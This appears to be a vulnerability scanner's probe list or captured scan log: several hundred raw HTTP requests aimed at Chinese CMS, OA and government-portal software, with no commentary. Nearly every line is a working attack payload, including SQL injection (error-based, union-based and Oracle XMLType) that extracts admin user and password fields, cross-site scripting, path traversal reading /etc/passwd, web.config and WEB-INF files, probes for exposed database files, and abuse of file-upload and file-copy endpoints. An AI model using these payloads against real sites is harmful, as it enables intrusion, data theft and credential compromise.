GET /count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
POST /ajax.php?action=contentpage
GET /comments.php?id=3a&tablepre=boka_ckck
GET /rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
GET //wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
GET /admin/index.php?_m=../template/css/login.css%00&_a=admin_list
GET /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
GET /login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
GET /info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
POST /ajax.php?action=letter&letter=a
GET /index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
GET /index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
GET /index.php/Index/index/name/$%7B@print(md5(1122))%7D
GET /index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
POST /index.php?m=payment&s=admin/pickupmod
GET /admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
GET /user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
HEAD /servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
POST /mep-admin/DcServlet
GET /mep-admin/userAction!queryUser.action?start=0&limit=10
GET /admin/picupload.aspx
GET /manager/picupload.aspx
GET /microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
POST /TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
GET /admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
GET /index.php?c=tj&f=include&js=/../../config.php
GET /index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
GET /api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
GET /radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
GET /system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
GET /cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
GET /
GET /styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
GET /web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
GET /forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
POST /Ajax_Handle/UploadPictureHandler.ashx
POST /Ajax_Handle/UploadLocalVideoHandler.ashx
POST /index.php?m=api&a=userpreview
POST /index.php?m=Appmanager&a=loadapp
POST /CMSUploadFile.aspx
POST /api/shop.aspx
GET /sysinfo.jsp
GET /login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
GET /login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
HEAD /file/MyDownLoad.ashx?path=../web.config
GET /file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
GET /broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
GET /feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
GET /channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
GET /login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
GET /api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
HEAD /FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
GET /setup/setup1.jsp
GET /examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
GET /Article/?Type=18%20/**/and/**/1=char(106)--
GET /login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
HEAD /file/EmailDownload.ashx?url=~/web.config&name=web.config
HEAD /file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
HEAD /file/DownLoad.ashx?path=~/Routes.config
GET /file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
GET /file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
HEAD /download.jsp?path=WEB-INF/&name=web.xml
HEAD /page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
POST /mx_form/order_save.php
POST /index.php?app=tag&ac=add&ts=do
GET /member.php?act=index
GET /Article/?KeyWord=1'%20and%201=char(97)%20--
HEAD /apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
GET /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
GET /Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
GET /Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
GET /Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
GET /Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
HEAD /jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
HEAD /jiep/down.jsp?pathfile=down.jsp%00.txt
GET /index.php?m=Goods&a=showcate&id=1'cfreer
GET /Goods-showcate-id-1.html'cfreer
GET /pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
POST /jvideo/objectbox/selectx_userlist.jsp
GET /yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
GET /Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
GET /Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
GET /celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
GET /ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
GET /ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
GET /burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /oa_server/App_Pages/App_page/UserSpuerAdd.aspx
GET /oa_server/App_Pages/App_page/user_list.aspx
POST /cms/cms/site/cms_site_template_upload.jsp?action=save
GET /cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
GET /deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
GET /deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
GET /lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
POST /web/SubmitLogin.do
GET /pic.aspx?classid=60)%20and%201=char(106)%20--
GET /frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
GET /engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
GET /index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
GET /SRP2003/UserManage/sysuser/modifypage.asp?id=1
GET /venus/AsVenusCA/desk/message/reply.asp
GET /Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
POST /mx_form/order_save.php?form_id=5
HEAD /download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
GET /cms/web/testsql.jsp
POST /web/zwdt/jjj.BjcxServlet
GET /login.php?LOGIN_USER_INCLUDE=/etc/passwd
POST /cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
POST /cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
GET /webUser/webUser!list.action
GET /logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /admin/annual/delete_leave.post.php
GET /admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
GET /admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
GET /admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
GET /down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
POST /jdwm/cgi/getpwd.cgi
GET /public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
GET /public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
GET /cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
GET /cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
GET /cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
GET /CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
GET /forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
GET /forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
GET /search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
POST /public/editext/up/soundsave.asp
POST /public/AspUpload/upload.asp?path=../../upload&processid=1
GET /xyEmployee_checkLoginForUser.do?userName=reer
GET /opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
GET /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
GET /kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
GET /kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
GET /kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
GET /picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
HEAD /opensoft.asp?%69d=10%20and%201=2
GET /phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
POST /bmsltxDetail.do
POST /setAcceptance.do
POST /setAcceptance.do
GET /setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /nobom.php
GET /infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
GET /lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
GET /lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
GET /admin/Admin_Config.asp
GET /Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
GET /zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
POST /FileUpload
GET /oa_server/App_Pages/App_page/user_update.aspx?userid=172
GET /api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
GET /conformID.asp?Tid=jx'%20and%201=char(106)%20--
GET /DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
HEAD /KS_Data/KesionCMS6.mdb
HEAD /KS_Data/KesionCMS7.mdb
HEAD /KS_Data/KesionCMS8.mdb
HEAD /KS_Data/KesionCMS9.mdb
GET /conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
POST /Asearch.asp
GET /linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
GET /zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
GET /Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
GET /specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
GET /toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
GET /index.php?c=ajax&a=member_login&template=../../ooxx.php
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
GET /workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
POST /search.aspx
HEAD /servlet/fileOpenforms?filename=/index.jsp
HEAD /application/gzhd/bgxz/download.jsp?filename=/index.jsp
GET /livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
GET /truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
GET /NewsList.asp
GET /ActivityList.asp
GET /WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
POST /common/guestbook.php
POST /common/help.php
GET /Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
POST /wap/index.php?a=newslist
GET /index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
GET /?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
GET /?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
POST /admin/uploadFile.action
GET /Adminiscentertrator/AdmIndex.asp
POST /Adminiscentertrator/AdmLinkInsert.asp
GET /corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /NewsList.asp
GET /bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
